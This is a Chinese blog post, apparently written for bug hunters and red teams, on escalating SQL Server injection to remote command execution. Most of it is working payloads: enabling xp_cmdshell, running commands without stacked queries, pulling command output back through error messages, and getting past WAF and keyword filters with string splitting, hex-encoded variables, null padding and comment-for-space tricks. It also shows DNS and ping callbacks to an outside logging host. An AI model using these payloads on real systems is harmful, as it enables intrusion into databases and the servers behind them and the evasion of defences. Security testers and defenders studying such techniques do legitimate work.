526互联

sql server注入rce实践

发布时间 2023-06-26 11:15:56作者: 飘渺红尘✨

 背景:在漏洞挖掘中,合理的利用sql注入,可以把注入转换成rce,使一个高危漏洞变成严重漏洞。在红蓝对抗中,利用注入rce,实现内网横向移动。笔者基于漏洞挖掘和红蓝对抗上遇到的sql server注入做了个sql server的rce实践总结。

1.如何判断sql server是否可以rce?

select user;

  权限为dbo

 

  确定当前用户是否为管理员:

SELECT IS_SRVROLEMEMBER('sysadmin')

 

只有是sysadmin组的sql server账号才能执行系统命令

 

 2.sql server 命令执行 xp_cmdshell扩展

exec master..xp_cmdshell 'ping a43bade1.ipv6.bypass.eu.org'

 

 

直接执行会报错,尝试开启xp_cmdshell:

 

 

 

在高版本的sql server中已经无法使用xp_cmdshell ,测试版本sql server2017.

详细介绍如下:https://stackoverflow.com/questions/59971345/cannot-enable-xp-cmdshell-on-sql-server-2017-express-on-linux

 

 

切换sql server为2008:

 

开启xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

 

 

 3.sql server特性:

数字+字符串,不会报错  sql server会认为id=1and 1=1 就是id=1和and 1=1,自动会做处理

 

 

4.变量声明特性 DECLARE

不需要set也能声明变量使用:

1> DECLARE @bc varchar (8000) = 0x6f72616e6765;
2> select * from Inventory where name=@bc;
3> go

 

 

bypass:允许空格脏数据

 

DECLARE @i varchar (8000) = 0x6f72616e6765202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020

2> select * from Inventory where name=@i;
3> go

 

 

不影响执行,原因在于数据后面的空格会被处理掉:

1> select * from Inventory where name="orange";
2> select * from Inventory where name="orange

 

完全不影响执行

 

数据前后支持填充00 bypass:

1> DECLARE @i varchar (8000) = 0x0000000000000000000000006f72616e6765000000000000000000000000000000
2> select * from Inventory where name=@i;
3> go

 

不会影响数据正常执行

 

5.sql server不支持堆叠也可以rce:

支持查询显示的sql server注入,不支持堆叠也可以rce:

select * from student where name='test'INSERT temp_abcdzxc(data) EXEC master..xp_cmdshell 'whoami' select '1'
select * from student where name='test'INSERT temp_abcdzxc(data) EXECute master..xp_cmdshell 'ipconfig'-- 123
ipconfig内容很大,会自动分行:

 

 

 

使用execute bypass:

 

如果命令执行的语句包含空格,那么需要双引号包裹:
execute('xp_cmdshell "nslookup baidu.com"')

一些变形:
支持换行空格填充
execute('xp_c'+'md' +       
'sh'+'ell'+' w'+'ho'+'ami')

更大的变形bypass:
execute('xp_c'+'md' +       
'sh'+'ell'+'                        


'+'"nslookup baidu.com"')

关键字检测的变形:
execute('xp_c'+'md' +       
'sh'+'ell'+'                        


'+'"nsl'+'ookup ba'+'idu.com"')

执行图在下方:

 

 

 

 

 

 

 

 

 

6.实战利用 不支持堆叠的情况下,可以进行报错注入回显 条件:支持sql语句报错

以数字类型sql注入为例:

第一步创建sql:
select * from student where id=1CREATE TABLE test_exec(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100))

 

 

 

第二步:

执行存储过程命令执行插入数据到相关列中:
select * from student where id=1 INSERT into test_exec(data) execute('xp_cmdshell whoami')

 

第三步:

通过sql报错回显命令:
select * from student where id=1 and 1=convert(int,(select data from test_exec where id=1))

 

 

成功执行命令

 

7.sql server不支持堆叠开启xp_cmdshell:

第一步:关闭xp_cmdshell:

RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0
execute('xp_cmdshell "nslookup baidu.com"')

 

 

第二步:不支持堆叠的情况下启动xp_cmdshell:

以字符串注入为例子:

select * from student where name='ddd' execute('EXEC sp_configure "xp_cmdshell",1')
select * from student where name='ddd' execute('RECONFIGURE')

 

再次执行命令,执行成功没用到分号:

 

 

方法2:使用exec执行存储过程 用于过滤括号()的场景:

select * from student where name='ddd' exec  sp_configure xp_cmdshell,1
select * from student where name='ddd' RECONFIGURE

 

 

 

成功执行命令

8.hw实战案例,过滤(),=,空格 ,进行盲注执行命令例子:

因为过滤了空格无法使用声明变量的方式执行命令
select * from student where name='ddd'/**/exec/**/sp_configure/**/xp_cmdshell,1
select * from student where name='ddd'/**/RECONFIGURE

因为过滤空格,所以执行命令需要使用特殊办法规避空格
execute('xp_cmdshell/**/"nslookup%CommonProgramFiles:~10,-18%baidu.com"')

 

 

 

9.关闭高级扩展不彻底导致的rce:

exec sp_configure  'show advanced options',0
RECONFIGURE
exec xp_cmdshell "whoami"

 

 

问题导致的原因:

 

 

10.判断是否支持声明变量的办法:

延迟2s
select * from student where name='ddd' declare @i varchar(3000)=0x77616974666F722064656C61792027303A303A3227 execute(@i)

 

 

如果支持执行命令:

玩法巨多,说一种bypass的:

select * from student where name='ddd' declare @i varchar(3000)=0x6e736c6f6f6b75702062616964752e636f6d00000000
exec-- 123
xp_cmdshell
@i

 

成功执行命令:

 

11.判断是否支持堆叠查询:

 

1.产生延迟
select * from student where name='ddd';waitfor delay '0:0:2'-- 123
2.返回200 和返回异常
select * from student where name='ddd'select '1'
select * from student where name='ddd'select EXP(111111)-- 123
图在下方:

 

 

 

 

 

12.补充 []字符串:今早chybeta给我发了个文章,我补充下[]的内容:

 使用[]字符串 bypass:

 

参考链接:https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/